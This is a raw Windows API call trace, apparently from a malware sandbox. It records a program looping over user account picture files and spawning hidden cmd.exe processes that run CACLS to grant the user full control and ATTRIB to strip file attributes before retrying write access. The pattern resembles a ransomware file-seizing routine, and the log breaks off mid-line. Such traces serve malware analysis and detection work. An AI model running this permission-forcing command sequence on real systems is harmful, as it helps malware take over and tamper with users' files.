[0189.587] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.587] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.587] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.587] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0189.587] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.587] ReleaseMutex (hMutex=0xf8) returned 1 [0189.587] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.587] ReleaseMutex (hMutex=0xf8) returned 1 [0189.587] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.587] ReleaseMutex (hMutex=0xf8) returned 1 [0189.587] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.587] ReleaseMutex (hMutex=0xf8) returned 1 [0189.587] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.588] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", lpFilePart=0x12eab4*="usertile39.bmp") returned 0x52 [0189.588] GetLastError () returned 0x5 [0189.588] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0189.588] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.588] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.588] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.588] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.588] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.588] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0189.588] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0189.589] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x5dc, dwThreadId=0x9d8)) returned 1 [0189.590] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] CloseHandle (hObject=0x1b4) returned 1 [0189.832] CloseHandle (hObject=0x120) returned 1 [0189.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] ReleaseMutex (hMutex=0xf8) returned 1 [0189.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] ReleaseMutex (hMutex=0xf8) returned 1 [0189.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] ReleaseMutex (hMutex=0xf8) returned 1 [0189.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] ReleaseMutex (hMutex=0xf8) returned 1 [0189.832] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.832] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", lpFilePart=0x12eab4*="usertile39.bmp") returned 0x52 [0189.832] GetLastError () returned 0x5 [0189.832] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0189.832] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.832] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.832] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.833] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.833] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.833] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.833] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.833] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0189.833] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.833] ReleaseMutex (hMutex=0xf8) returned 1 [0189.833] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.833] ReleaseMutex (hMutex=0xf8) returned 1 [0189.833] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.833] ReleaseMutex (hMutex=0xf8) returned 1 [0189.833] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.833] ReleaseMutex (hMutex=0xf8) returned 1 [0189.833] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.833] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", lpFilePart=0x12eab4*="usertile40.bmp") returned 0x52 [0189.833] GetLastError () returned 0x5 [0189.833] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0189.833] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.833] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.833] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.834] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.834] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.834] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0189.834] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0189.834] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x878, dwThreadId=0x550)) returned 1 [0189.835] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] CloseHandle (hObject=0x1b4) returned 1 [0190.126] CloseHandle (hObject=0x120) returned 1 [0190.126] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] ReleaseMutex (hMutex=0xf8) returned 1 [0190.126] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] ReleaseMutex (hMutex=0xf8) returned 1 [0190.126] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] ReleaseMutex (hMutex=0xf8) returned 1 [0190.126] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] ReleaseMutex (hMutex=0xf8) returned 1 [0190.126] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0190.127] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", lpFilePart=0x12eab4*="usertile40.bmp") returned 0x52 [0190.127] GetLastError () returned 0x5 [0190.127] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0190.127] LocalFree (hMem=0x1c6cc8) returned 0x0 [0190.127] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0190.127] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0190.127] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0190.127] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0190.127] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0190.127] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0190.127] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0190.127] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.127] ReleaseMutex (hMutex=0xf8) returned 1 [0190.127] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.127] ReleaseMutex (hMutex=0xf8) returned 1 [0190.127] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.127] ReleaseMutex (hMutex=0xf8) returned 1 [0190.127] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.127] ReleaseMutex (hMutex=0xf8) returned 1 [0190.127] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0190.127] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", lpFilePart=0x12eab4*="usertile41.bmp") returned 0x52 [0190.128] GetLastError () returned 0x5 [0190.128] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0190.128] LocalFree (hMem=0x1c6cc8) returned 0x0 [0190.128] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0190.128] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0190.128] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0190.128] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0190.128] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0190.128] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0190.128] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9d4, dwThreadId=0x888)) returned 1 [0190.129] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0191.193] CloseHandle (hObject=0x1b4) returned 1 [0191.193] CloseHandle (hObject=0x120) returned 1 [0191.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.193] ReleaseMutex (hMutex=0xf8) returned 1 [0191.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.193] ReleaseMutex (hMutex=0xf8) returned 1 [0191.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.193] ReleaseMutex (hMutex=0xf8) returned 1 [0191.194] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.194] ReleaseMutex (hMutex=0xf8) returned 1 [0191.194] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.194] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", lpFilePart=0x12eab4*="usertile41.bmp") returned 0x52 [0191.194] GetLastError () returned 0x5 [0191.194] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0191.194] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.194] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.194] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.194] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.194] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.194] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.194] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.194] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0191.194] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.194] ReleaseMutex (hMutex=0xf8) returned 1 [0191.194] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.194] ReleaseMutex (hMutex=0xf8) returned 1 [0191.194] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.194] ReleaseMutex (hMutex=0xf8) returned 1 [0191.195] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.195] ReleaseMutex (hMutex=0xf8) returned 1 [0191.195] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.195] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", lpFilePart=0x12eab4*="usertile42.bmp") returned 0x52 [0191.195] GetLastError () returned 0x5 [0191.195] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0191.195] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.195] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.195] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.195] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.195] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.195] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0191.195] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0191.195] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x8f8, dwThreadId=0x8f0)) returned 1 [0191.197] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0191.538] CloseHandle (hObject=0x1b4) returned 1 [0191.538] CloseHandle (hObject=0x120) returned 1 [0191.538] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.538] ReleaseMutex (hMutex=0xf8) returned 1 [0191.538] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.538] ReleaseMutex (hMutex=0xf8) returned 1 [0191.538] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] 